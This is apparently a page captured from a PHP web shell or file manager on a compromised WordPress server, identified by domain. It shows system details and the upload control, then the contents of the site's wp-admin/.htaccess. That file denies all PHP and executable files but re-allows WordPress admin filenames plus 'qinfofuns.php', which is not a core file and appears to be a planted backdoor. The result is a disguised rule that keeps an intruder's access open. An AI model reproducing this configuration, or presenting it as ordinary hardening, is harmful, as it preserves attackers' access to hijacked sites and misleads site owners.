HEX
Server: Apache
System: Linux mare-tim-wwwmocrea 6.8.12-9-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-9 (2025-03-16T19:18Z) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/vhost/www.mocrea.it/wp-admin/.htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

<FilesMatch "^(custom-background\.php|widgets-form\.php|media-upload\.php|custom-header\.php|load-styles\.php|ms-edit\.php|link-parse-opml\.php|ms-themes\.php|widgets-form-blocks\.php|contribute\.php|user-edit\.php|export-personal-data\.php|ms-upgrade-network\.php|wp-signup\.php|wp-config-sample\.php|styles\.php|edit-comments\.php|my-sites\.php|plugins\.php|link-manager\.php|ms-admin\.php|credits\.php|wp-activate\.php|wp-comments-post\.php|admin-functions\.php|menu\.php|index\.php|update\.php|theme-editor\.php|options-reading\.php|edit\.php|edit-tags\.php|term\.php|media\.php|upgrade\.php|about\.php|plugin-editor\.php|link\.php|menu-header\.php|wp-load\.php|wp-cron\.php|media-new\.php|post\.php|setup-config\.php|moderation\.php|install\.php|widgets\.php|update-core\.php|nav-menus\.php|options\.php|options-general\.php|admin-header\.php|options-media\.php|wp-login\.php|admin\.php|load-scripts\.php|site-editor\.php|freedoms\.php|wp-links-opml\.php|options-discussion\.php|edit-form-comment\.php|customize\.php|privacy-policy-guide\.php|qinfofuns\.php|wp-blog-header\.php|edit-form-blocks\.php|site-health-info\.php|admin-ajax\.php|link-add\.php|ms-options\.php|options-permalink\.php|authorize-application\.php|themes\.php|ms-users\.php|xmlrpc\.php|post-new\.php|export\.php|wp-upgrade\.php|network\.php|comment\.php|options-head\.php|user-new\.php|import\.php|tools\.php|ms-sites\.php|edit-link-form\.php|erase-personal-data\.php|privacy\.php|options-writing\.php|press-this\.php|async-upload\.php|options-connectors\.php|wp-trackback\.php|install-helper\.php|profile\.php|edit-form-advanced\.php|site-maintenance\.php|users\.php|edit-tag-form\.php|upload\.php|theme-install\.php|admin-post\.php|ms-delete-site\.php|font-library\.php|wp-mail\.php|options-privacy\.php|revision\.php|plugin-install\.php|site-health\.php|upgrade-functions\.php|wp-settings\.php|admin-footer\.php)$">
    <IfModule mod_authz_core.c>
        Require all granted
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Allow from all
    </IfModule>
</FilesMatch>

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
</IfModule>